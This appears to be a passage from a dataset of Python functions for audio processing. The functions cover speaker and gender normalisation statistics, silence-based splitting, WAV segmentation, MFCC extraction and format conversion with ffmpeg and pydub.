global_mean_female,\n global_std_male, global_std_female, frame_num_dict)", "def read_audio(audio_paths, speaker_dict, tool, config, normalize, is_training,\n save_path=None,\n train_global_mean_male=None, train_global_mean_female=None,\n train_global_std_male=None, train_global_std_female=None,\n dtype=np.float64):\n if not is_training:\n if train_global_mean_male is None or train_global_mean_female is None:\n raise ValueError('Set mean & std computed in the training set.')\n if normalize not in ['global', 'speaker', 'utterance']:\n raise ValueError('normalize is \"utterance\" or \"speaker\" or \"global\".')\n\n audio_path_list_male, audio_path_list_female = [], []\n total_frame_num_male, total_frame_num_female = 0, 0\n total_frame_num_dict = {}\n speaker_mean_dict = {}\n\n # NOTE: speaker norm は講演ごとの正規化とする\n # 講演間の話者関係がわからないから\n\n # Loop 1: Computing global mean and statistics\n if is_training:\n print('===> Reading audio files...')\n for i, audio_path in enumerate(tqdm(audio_paths)):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio file into utterances\n _, input_data_utt_sum, speaker_mean, _, total_frame_num_speaker = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n if i == 0:\n # Initialize global statistics\n feature_dim = input_data_utt_sum.shape[0]\n train_global_mean_male = np.zeros((feature_dim,), dtype=dtype)\n train_global_mean_female = np.zeros(\n (feature_dim,), dtype=dtype)\n train_global_std_male = np.zeros((feature_dim,), dtype=dtype)\n train_global_std_female = np.zeros((feature_dim,), dtype=dtype)\n\n # For computing global mean\n if speaker[3] == 'M':\n audio_path_list_male.append(audio_path)\n train_global_mean_male += input_data_utt_sum\n total_frame_num_male += total_frame_num_speaker\n elif speaker[3] == 'F':\n audio_path_list_female.append(audio_path)\n train_global_mean_female += input_data_utt_sum\n total_frame_num_female += total_frame_num_speaker\n else:\n raise ValueError\n\n # For computing speaker stddev\n if normalize == 'speaker':\n speaker_mean_dict[speaker] = speaker_mean\n total_frame_num_dict[speaker] = total_frame_num_speaker\n # NOTE: すでに話者平均は計算できている\n\n print('===> Computing global mean & stddev...')\n # Compute global mean per gender\n train_global_mean_male /= total_frame_num_male\n train_global_mean_female /= total_frame_num_female\n\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, _, _, _ = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=True,\n sil_duration=0,\n tool=tool,\n config=config)\n\n # For computing global stddev\n if speaker[3] == 'M':\n for input_data_utt in input_data_dict_speaker.values():\n train_global_std_male += np.sum(\n np.abs(input_data_utt - train_global_mean_male) ** 2, axis=0)\n elif speaker[3] == 'F':\n for input_data_utt in input_data_dict_speaker.values():\n train_global_std_female += np.sum(\n np.abs(input_data_utt - train_global_mean_female) ** 2, axis=0)\n else:\n raise ValueError\n\n # Compute global stddev per gender\n train_global_std_male = np.sqrt(\n train_global_std_male / (total_frame_num_male - 1))\n train_global_std_female = np.sqrt(\n train_global_std_female / (total_frame_num_female - 1))\n\n if save_path is not None:\n # Save global mean & std per gender\n np.save(join(save_path, 'train_global_mean_male.npy'),\n train_global_mean_male)\n np.save(join(save_path, 'train_global_mean_female.npy'),\n train_global_mean_female)\n np.save(join(save_path, 'train_global_std_male.npy'),\n train_global_std_male)\n np.save(join(save_path, 'train_global_std_female.npy'),\n train_global_std_female)\n\n # Loop 2: Normalization and Saving\n print('===> Normalization...')\n frame_num_dict = {}\n for audio_path in tqdm(audio_paths):\n speaker = basename(audio_path).split('.')[0]\n\n if normalize == 'speaker' and is_training:\n speaker_mean = speaker_mean_dict[speaker]\n else:\n speaker_mean = None\n\n # Divide each audio into utterances\n input_data_dict_speaker, _, speaker_mean, speaker_std, _ = segment_htk(\n audio_path,\n speaker,\n speaker_dict[speaker],\n is_training=is_training,\n sil_duration=0,\n tool=tool,\n config=config,\n mean=speaker_mean) # for compute speaker sttdev\n # NOTE: input_data_dict_speaker have been not normalized yet\n\n for utt_index, input_data_utt in input_data_dict_speaker.items():\n\n if normalize == 'utterance' and is_training:\n # Normalize by mean & std per utterance\n utt_mean = np.mean(input_data_utt, axis=0, dtype=dtype)\n utt_std = np.std(input_data_utt, axis=0, dtype=dtype)\n input_data_utt = (input_data_utt - utt_mean) / utt_std\n\n elif normalize == 'speaker' and is_training:\n # Normalize by mean & std per speaker\n input_data_utt = (input_data_utt - speaker_mean) / speaker_std\n\n else:\n # Normalize by mean & std over the training set per gender\n if speaker[3] == 'M':\n input_data_utt -= train_global_mean_male\n input_data_utt /= train_global_std_male\n elif speaker[3] == 'F':\n input_data_utt -= train_global_mean_female\n input_data_utt /= train_global_std_female\n else:\n raise ValueError\n\n if save_path is not None:\n # Save input features\n input_data_save_path = mkdir_join(\n save_path, speaker + '_' + utt_index + '.npy')\n np.save(input_data_save_path, input_data_utt)\n frame_num_dict[speaker + '_' +\n utt_index] = input_data_utt.shape[0]\n\n if save_path is not None:\n # Save the frame number dictionary\n with open(join(save_path, 'frame_num.pickle'), 'wb') as f:\n pickle.dump(frame_num_dict, f)\n\n return (train_global_mean_male, train_global_mean_female,\n train_global_std_male, train_global_std_female)", "def __save(self,audio):\n self.__openSampleFile()\n self.__sampleFile.writeframes(audio)", "def generate_seg_file(self, filename):\n self._generate_a_seg_file(filename, self.wave[:-4])", "def segment(sound_file, spec_file, ms_step, pix_per_s, sound_output_dir, spec_output_dir):\n pix_per_ms = pix_per_s/1000\n sound = AudioSegment.from_wav(sound_file)\n start, stop = 0, ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms\n spec = Image.open(spec_file)\n chopping = True\n while stop <= len(sound):\n \n # Split sound\n chunk = sound[start:stop]\n chunk.export(sound_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".wav\", format=\"wav\")\n\n # Split spectrogram\n w, h = spec.size\n cropped_spec = spec.crop((start_pixel, 0, stop_pixel, h))\n cropped_spec.save(spec_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".png\")\n\n start += ms_step\n stop += ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms", "def set_fname_encoder(self):\n\n fp = open(self.meta_path, 'r')\n wav_names = []\n next(fp)\n for i, line in tqdm(enumerate(fp)):\n audio_name, _, _, _ = line.split()\n wav_name = os.path.basename(audio_name)\n wav_names.append(wav_name)\n self.fname_encoder.fit(wav_names)", "def diarization(self):\n self._status = 1\n if self._single:\n try:\n os.mkdir(self.get_file_basename())\n except OSError, err:\n if err.errno != 17:\n raise err\n fm._silence_segmentation(self._basename)\n fm._gender_detection(self._basename)\n segname = self._basename + '.seg'\n f_seg = open(segname, 'r')\n headers = []\n values = []\n differ = False\n basic = None\n gen = {'M': 0, 'F': 0, 'U': 0}\n for line in f_seg.readlines():\n if line.startswith(';;'):\n headers.append(line[line.index('['):])\n else:\n a_line = line.split(' ')\n if basic == None:\n basic = a_line[4]\n if a_line[4] != basic:\n differ = True\n gen[a_line[4]] += int(a_line[3])\n values.append(a_line)\n header = \";; cluster:S0 %s\" % headers[0]\n from operator import itemgetter\n index = 0\n while index < len(values):\n values[index][2] = int(values[index][2])\n index += 1\n values = sorted(values, key=itemgetter(2))\n index = 0\n while index < len(values):\n values[index][2] = str(values[index][2])\n index += 1\n newfile = open(segname + '.tmp', 'w')\n newfile.write(header)\n if differ: #in case the gender of the single segments differ \n# then set the prevailing\n# print 'transgender :-D'\n if gen[ 'M' ] > gen[ 'F' ]:\n basic = 'M'\n elif gen[ 'M' ] < gen[ 'F' ] :\n basic = 'F'\n else:\n basic = 'U'\n\n for line in values:\n line[4] = basic #same gender for all segs\n newfile.write(' '.join(line[:-1]) + ' S0\\n')\n f_seg.close()\n newfile.close()\n shutil.copy(self.get_file_basename() + '.wav',\n os.path.join(self.get_file_basename(), 'S0' + '.wav'))\n shutil.move(segname + '.tmp', segname)\n shutil.copy(self.get_file_basename() + '.seg',\n os.path.join(self.get_file_basename(), 'S0' + '.seg'))\n utils.ensure_file_exists(segname)\n else:\n# print str(self._diar_conf[0])\n# print str(self._diar_conf[1])\n fm.diarization(self._basename, str(self._diar_conf[0]),\n str(self._diar_conf[1]))\n self._status = 2", "def save_all_chunks_with_labels(audio_dir, json_dir, csv_dir):\n for file in os.listdir(json_dir):\n file_path = os.path.join(json_dir, file)\n audio_file_path = os.path.join(audio_dir, file)[:-4] + \"wav\"\n with open(file_path) as f:\n data = json.load(f)\n save_arrays_with_labels(audio_file_path, data, csv_dir)", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"spliting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def slice_recording(path_recording, path_metadata_filepath_duration):\n\n metadata_filepath_duration = open(path_metadata_filepath_duration, 'r')\n\n start = 0.0\n\n for line in metadata_filepath_duration:\n filepath, duration = line.split(\" | \")\n target_filepath = re.sub('/Mixtures/', '/mic_recordings/Mixtures/', filepath)\n target_parentpath = re.sub('/mixture.wav', '', target_filepath)\n\n # creating folder if the folder doesnot exist\n try:\n os.makedirs(target_parentpath)\n except OSERROR as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(target_parentpath):\n pass\n\n delta_t = float(duration)\n\n # calling ffmpeg to slice the wav file into its respective sizes\n subprocess.call([\"ffmpeg\", \"-i\", path_recording, \"-ss\", str(start), \"-t\", str(delta_t), \"-acodec\", \"copy\", target_filepath])\n\n # resetting the start for next file in line\n start += delta_t\n\n metadata_filepath_duration.close()", "def get_large_audio_transcription(path):\n # open the audio file using pydub\n r = sr.Recognizer()\n sound = AudioSegment.from_mp3(path)\n sound.export(\"tmp.wav\", format=\"wav\")\n sound = AudioSegment.from_wav('tmp.wav')\n # split audio sound where silence is 700 miliseconds or more and get chunks\n chunks = split_on_silence(sound,\n # experiment with this value for your target audio file\n min_silence_len = 500,\n # adjust this per requirement\n silence_thresh = sound.dBFS-14,\n # keep the silence for 1 second, adjustable as well\n keep_silence=500,\n )\n folder_name = \"audio-chunks\"\n # create a directory to store the audio chunks\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n whole_text = \"\"\n\n chapter=(str(path.split('/')[-1])).split('_')[3]\n # if chapter == '01':\n # target=2\n # else:\n # target=1\n target=2\n # process each chunk\n for i, audio_chunk in enumerate(chunks, start=1):\n # export audio chunk and save it in\n # the `folder_name` directory.\n if i==1:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened,language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n #print(chunk_filename, \":\", text)\n whole_text += text\n # return the text for all chunks detected\n else:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened, language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n # print(chunk_filename, \":\", text)\n if chapter == '01':\n whole_text += ' ' +text\n if str(text).isalnum():\n if str(text).split(' ')[0]==' ':\n whole_text += text\n else: whole_text += ' '+text\n # return the text for all chunks detected\n\n if i==target:\n break\n if os.path.isfile('tmp.wav') :os.remove('tmp.wav')\n subprocess.run([\"rm\", \"-rf\", folder_name])\n return whole_text", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def segment_10s(audio, sr):\n seg_files = {}\n n_seg = int((len(audio)/sr)/10)\n for i in range(n_seg):\n segment = audio[10*i*sr:(i+1)*10*sr]\n seg_files[i] = segment\n return seg_files", "def write_audio_segment(self, data):\n cache_name = self.CACHE_FILE_NAME + str(time.time()) + '.wav'\n file = open(cache_name, \"wb\")\n file.write(data)\n file.close()\n return cache_name", "def audio_file_save(folder_path, current_time, data, name_by_date):\r\n\r\n name_by_time = current_time + '.wav' #timestamp for the audio file name\r\n usage = disk_usage(folder_path)\r\n if usage.used / usage.total < args.storage_threshold:\r\n file_path = os.path.join(folder_path, name_by_time)\r\n\r\n if args.resampling:\r\n sampling_rate = args.resampling_rate\r\n audio = audio_resampling(data)\r\n else:\r\n sampling_rate = args.recording_samplerate\r\n audio = data\r\n\r\n sf.write(file_path , audio, sampling_rate)\r\n\r\n else:\r\n name = os.path.join(folder_path, name_by_date + '.txt')\r\n f = open(name, 'a')\r\n f.write(current_time + '\\t Activity Detected \\n')\r\n f.close()", "def save_sample(file_path, sampling_rate, audio):\n audio = (audio.numpy() * 32768).astype(\"int16\")\n write(file_path, sampling_rate, audio)", "def make_profiles(datafolder, profilefolder, size):\n files = os.listdir(datafolder) \n for file in files:\n languagename = file.split(\"-\")[0]\n encodering = file.split(\"-\")[1]\n bestand = open('training/' + file,'r' , encoding=encodering) #Reads with the correct encoding.\n test = langdetect.trigram_table(bestand.read(), size) #Creates a ngram table of the content of the file.\n filename = languagename + '.' + str(size) + '.txt' #Creates a new filename.\n newfile = open('trigram-models/' + filename, 'w', encoding=\"utf-8\") \n langdetect.write_trigrams(test, 'trigram-models/' + filename) #Creates a new file with the ngrams and their frequency.\n newfile.close()", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def split_on_silence_threshold(wav_file, dest_dir):\n # Read the file\n audioSegment = AudioSegment.from_wav(wav_file)\n # Calculating the silence threshold\n # Normalizing the audio file belfore finding the threshold\n full_audio_wav = normalize(audioSegment)\n loudness_ms_list = [] # Save the audio levels of all the chunks\n for ms_chunk in full_audio_wav:\n loudness_ms_list.append(round(ms_chunk.dBFS))\n print(\"Audio levels are recorded\", file=sys.stderr)\n # Using pandas df for easier manipulation\n df = pd.DataFrame(loudness_ms_list)\n df[0] = df[df[0] != float(\"-inf\")] # Remove the very low levels\n st = df[0].mean()\n st = st if st < -16 else -16 # Because -16db is default\n # Splits the audio if silence duration is MSL long\n MSL = 500 # minimum silence length in ms\n chunks = split_on_silence(\n full_audio_wav, \n # split on silences longer than 500ms (500ms)\n min_silence_len=MSL, \n # anything under -16 dBFS is considered silence\n silence_thresh=st, \n # keep 200 ms of leading/trailing silence\n keep_silence=200, \n )\n # Saving all the chunks\n print(\"Writing all the files, this may take some time!\", file=sys.stderr)\n for index, chunk in enumerate(chunks):\n chunk_file_name = os.path.join(dest_dir, \"sample_{}.wav\".format(str(index).zfill(10)))\n print(\"Saving the file to \" + chunk_file_name, file=sys.stderr)\n # You can export as mp3 etc, note that it has dependency on ffmpeg\n chunk.export(chunk_file_name, format=\"wav\")", "def create_wav_file(self, ):\n\n f_out = open(self.wav_file, 'w')\n u_utt2spk = open(self.utt2spk, 'w')\n for file in glob.glob(self.wav_folder+'/*.wav'):\n base = os.path.basename(file).split('.')[0]\n # write to scp file\n f_out.write(base + '\\t' + file + '\\n')\n u_utt2spk.write(base + '\\t' + 'tts' + '\\n')", "def save_segmentation_samples(self, dest=\"./Datasets/IsophonicsSegmentation.seg\", song_indices=[0, 10, 20, 30, 40, 50, 60, 70], hop_length=512, norm_to_C=False, spectrogram_generator=log_mel_spectrogram, n_frames=500):\n data = []\n chords = []\n gold_targets = []\n # Iterate over all song indices on the input\n for song_ind in song_indices:\n # Prprocess audio\n preprocessed_audio = IsophonicsDataset.preprocess_audio(\n waveform=self.DATA[song_ind].WAVEFORM,\n sample_rate=self.DATA[song_ind].SAMPLE_RATE,\n spectrogram_generator=spectrogram_generator,\n nfft=self.NFFT, hop_length=hop_length,\n norm_to_C=norm_to_C, key=self.KEYS[song_ind].get_first_key()\n ).swapaxes(0,1)\n\n num_samples, _ = preprocessed_audio.shape\n\n # Convert data and chord targets to sequences\n data_in_seqs, targets_in_seqs = Dataset.songs_to_sequences(\n FEATURESs=[preprocessed_audio],\n CHORDs=[self.CHORDS[song_ind]],\n TIME_BINSs=[[float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)]],\n KEYs=self.KEYS[song_ind].get_first_key(),\n n_frames=n_frames,\n norm_to_C=norm_to_C\n )\n\n # Add song's sequences to lists as a new element\n data.append(data_in_seqs)\n chords.append(targets_in_seqs)\n gold_targets.append(SegmentationCRNN.labels2changes(targets = chords[-1]))\n\n # Save all three np arrays generated in this function .. data, chords, gold_targets aka chord changes\n with lzma.open(dest, \"wb\") as dataset_file:\n pickle.dump((data, chords, gold_targets), dataset_file)\n\n print(\"[INFO] The Isophonics segmentation samples was saved successfully.\")", "def compress_segments(map_, wav_id, file_path, segments, outpath):\n try:\n audio = AudioSegment.from_wav(file_path)\n #print(\"\\nSegments:\", len(segments))\n for _, row in segments.iterrows():\n start = row[2] * 1000\n end = row[3] * 1000\n audio_chunk = audio[start:end]\n save_path = \"{}/{}_chunk_{}_{}.wav\".format(outpath, wav_id, start, end)\n audio_chunk.export(save_path, format='wav')\n compress_file(map_=map_, \n name=row[0],\n save_path=save_path)\n except Exception as e:\n print(\"ERR:\",e)\n print(\"Failed files:\", file_path)", "def create_sample_files(bam_file_name, fractions):\n\n print(\"running sample retreival: \\n\\n\")\n\n sample_folder = \"./%s_sample_stats/\" % bam_file_name.replace(\n \"_mRNA.bam\", \"\")\n\n if not os.path.exists(sample_folder):\n os.mkdir(sample_folder)\n os.chdir(sample_folder)\n else:\n os.chdir(sample_folder)\n print(\"fractions: \", fractions)\n for decimal in fractions:\n print(\"%s: started\" % decimal)\n file_var = \"%s_sample.bam\" % str(decimal).replace(\"0.\", \"\")\n\n # extract sample\n print(bam_file_name, file_var)\n sample_cmd = \"samtools view ../%s -s %s -b -@12 > %s\" % (\n bam_file_name, '{:f}'.format(decimal), file_var)\n print(sample_cmd)\n os.system(sample_cmd)", "def save(self, fname, master_volume=1.):\n \n # first pass - find max amplitude value to normalise output\n vmax = 0.\n for c in range(len(self.out_channels)):\n vmax = max(\n abs(self.out_channels[str(c)].values.max()),\n abs(self.out_channels[str(c)].values.min()),\n vmax\n )\n\n # normalisation for conversion to int32 bitdepth wav\n norm = master_volume * (pow(2, 31)-1) / vmax\n\n # setup array to house wav stream data \n chans = np.zeros((self.out_channels['0'].values.size,\n len(self.out_channels)), dtype=\"int32\")\n \n # normalise and collect channels into a list\n for c in range(len(self.out_channels)):\n vals = self.out_channels[str(c)].values\n chans[:,c] = (vals*norm).astype(\"int32\")\n \n # finally combine and write out wav file\n wavfile.write(fname, self.samprate, chans)\n print(f\"Saved {fname}\")", "def save_to_file(\n sources,\n codec='wav', audio_adapter=ffmpeg.FFMPEGProcessAudioAdapter(),\n bitrate='128k', synchronous=True):\n\n # filename = \"chengdu.mp3\"\n pool = Pool()\n tasks = []\n for instrument, data in sources.items():\n path = \"./out/\"+instrument + \".\" + codec\n\n if pool:\n task = pool.apply_async(audio_adapter.save, (\n path,\n data,\n 44100,\n codec,\n bitrate))\n tasks.append(task)\n else:\n audio_adapter.save(path, data, 44100, codec, bitrate)\n if synchronous and pool:\n while len(tasks) > 0:\n task = tasks.pop()\n task.get()\n task.wait(timeout=200)", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_stereo(self, fname, master_volume=1.):\n\n if len(self.out_channels) > 2:\n print(\"Warning: sonification has > 2 channels, only first 2 will be used. See 'save_combined' method.\")\n \n # first pass - find max amplitude value to normalise output\n # and concatenate channels to list\n vmax = 0.\n channels = []\n for c in range(min(len(self.out_channels), 2)):\n vmax = max(\n abs(self.out_channels[str(c)].values.max()),\n abs(self.out_channels[str(c)].values.min()),\n vmax\n ) / master_volume\n channels.append(self.out_channels[str(c)].values)\n \n wav.write(fname, \n np.column_stack(channels),\n self.samprate, \n scale = (-vmax,vmax),\n sampwidth=3)\n \n print(\"Saved.\")", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def load_data(self):\r\n if not os.path.exists(self.origin_dir):\r\n raise ValueError(f\"Folder {self.origin_dir} not exists!\")\r\n\r\n # loop folders\r\n listglobs = glob.glob(os.path.join(self.origin_dir)+r\"[0-9]*\")\r\n count = 0\r\n temp = []\r\n for x in listglobs:\r\n\r\n # step1, get speaker id md5\r\n user_id = x.rsplit(\"\\\\\")[-1]\r\n speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n print(\"1=>\", x)\r\n\r\n for k in [\"你好小顺\", \"小顺小顺\"]:\r\n paths = os.path.join(x, k)\r\n print(\"2=>\", paths)\r\n # step2, parse speaker info\r\n with open(os.path.join(paths, \"spearker_info.txt\"), 'r', encoding=\"utf-8\") as f:\r\n line = f.readline()\r\n arrs = line.strip().split(\"\\\\t\")\r\n if len(arrs) != 3:\r\n raise ValueError(\"Required three field in speaker_info<id>\\t<gender>\\t<age>\")\r\n self.wav_desc[\"gender\"] = arrs[1].strip(\"<\").rstrip(\">\")\r\n self.wav_desc[\"age\"] = arrs[-1].strip(\"<\").rstrip(\">\")\r\n\r\n # step3, parse wav detailed information\r\n # key: wav_id, value: info_list, [keyword, noise_type, distance, speed,user_id, equipment]\r\n wav_infos_dict = {}\r\n with open(os.path.join(paths, \"wav_desc.txt\"), \"r\", encoding=\"utf-8\") as f:\r\n for line in f.readlines():\r\n arrs = line.strip().split(\"\\\\t\")\r\n wav_infos_dict[arrs[0].strip(\"<\").rstrip(\">\")] = [x.strip(\"<\").rstrip(\">\") for\r\n x in arrs[1:]]\r\n\r\n print(f\"Parse wav info finished find {len(wav_infos_dict)} infos.\")\r\n\r\n # Step4, audio with background noise and without nose, which was back_wav and wav_data folder\r\n for wav_folder in [\"back_wav\", \"wav_data\"]:\r\n audio_lists = glob.glob(os.path.join(paths + f\"\\\\{wav_folder}\", \"*.wav\"))\r\n for xa in audio_lists:\r\n # copy data to\r\n wav_id, user_id = get_wav_name(xa)\r\n # print(wav_id, user_id)\r\n # create md5 id\r\n utt_id = hashlib.md5(xa.encode(\"utf-8\")).hexdigest()\r\n # speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n # print(utt_id, speaker_id)\r\n # collect all info for an audio\r\n self.wav_desc[\"utt_id\"] = utt_id\r\n infos = wav_infos_dict[wav_id]\r\n if len(infos) != 6:\r\n print(\"==>\", infos)\r\n self.wav_desc[\"keyword_id\"] = self.keywords_dict[infos[0]]\r\n self.wav_desc[\"noise_type\"] = infos[1]\r\n self.wav_desc[\"distance\"] = infos[2]\r\n self.wav_desc[\"record_speed\"] = infos[3]\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n self.wav_desc[\"record_equipment\"] = infos[5]\r\n\r\n # record wav information\r\n t_infos = copy.deepcopy(self.wav_desc)\r\n self.all_wavs.append(t_infos)\r\n count += 1\r\n temp.append(utt_id)\r\n\r\n # copy data to resource folder\r\n dest = shutil.copy2(xa, os.path.join(self.dest_dir, f\"audios/{utt_id}.wav\"))\r\n set_index = which_set(dest, 20, 30)\r\n self.data_index[set_index].append(t_infos)\r\n\r\n # write wav information into json file\r\n with open(os.path.join(self.dest_dir, \"resources/wav_desc.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.all_wavs, f, ensure_ascii=False, indent=True)\r\n print(f\"total wavs:{count}, total ids:{len(temp)}\")\r\n for set_index in self.data_index.keys():\r\n with open(os.path.join(self.dest_dir, f\"resources/p_{set_index}.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.data_index[set_index], f, ensure_ascii=False, indent=True)\r\n print(f\"Collect {set_index} data total {len(self.data_index[set_index])} samples.\")", "def save_mfcc(dataset_path, json_path, num_mfcc=13, n_fft=2048, hop_length=512, num_segments=5):\n\n # dictionary to store mapping, labels, and MFCCs\n data = {\n \"mapping\": [],\n \"labels\": [],\n \"mfcc\": []\n }\n\n samples_per_segment = int(SAMPLES_PER_TRACK / num_segments)\n num_mfcc_vectors_per_segment = math.ceil(samples_per_segment / hop_length)\n\n # loop through all genre sub-folder\n for i, (dirpath, dirnames, filenames) in enumerate(os.walk(dataset_path)):\n\n # ensure we're processing a genre sub-folder level\n if dirpath is not dataset_path:\n\n # save genre label (i.e., sub-folder name) in the mapping\n semantic_label = dirpath.split(\"/\")[-1]\n data[\"mapping\"].append(semantic_label)\n print(\"\\nProcessing: {}\".format(semantic_label))\n\n # process all audio files in genre sub-dir\n for f in filenames:\n\n # load audio file\n file_path = os.path.join(dirpath, f)\n signal, sample_rate = librosa.load(file_path, sr=SAMPLE_RATE)\n\n # process all segments of audio file\n for d in range(num_segments):\n\n # calculate start and finish sample for current segment\n start = samples_per_segment * d\n finish = start + samples_per_segment\n\n # extract mfcc\n mfcc = librosa.feature.mfcc(signal[start:finish], sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,\n hop_length=hop_length)\n mfcc = mfcc.T\n\n # store only mfcc feature with expected number of vectors\n if len(mfcc) == num_mfcc_vectors_per_segment:\n data[\"mfcc\"].append(mfcc.tolist())\n data[\"labels\"].append(i - 1)\n print(\"{}, segment:{}\".format(file_path, d + 1))\n\n # save MFCCs to json file\n with open(json_path, \"w\") as fp:\n json.dump(data, fp, indent=4)", "def convert(\n album,\n):\n for track in list_dir(album):\n ext = splitext(track)[1]\n if ext != \".mp3\":\n new_track = track.replace(ext, \".mp3\")\n if not exists(new_track):\n track_non_mp3 = AudioSegment.from_file(track, format=ext[1:])\n print(f\"{track} -> {new_track}\")\n track_non_mp3.export(new_track, format=\"mp3\")\n os.remove(track)", "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. \"\n \"Returning %.2f 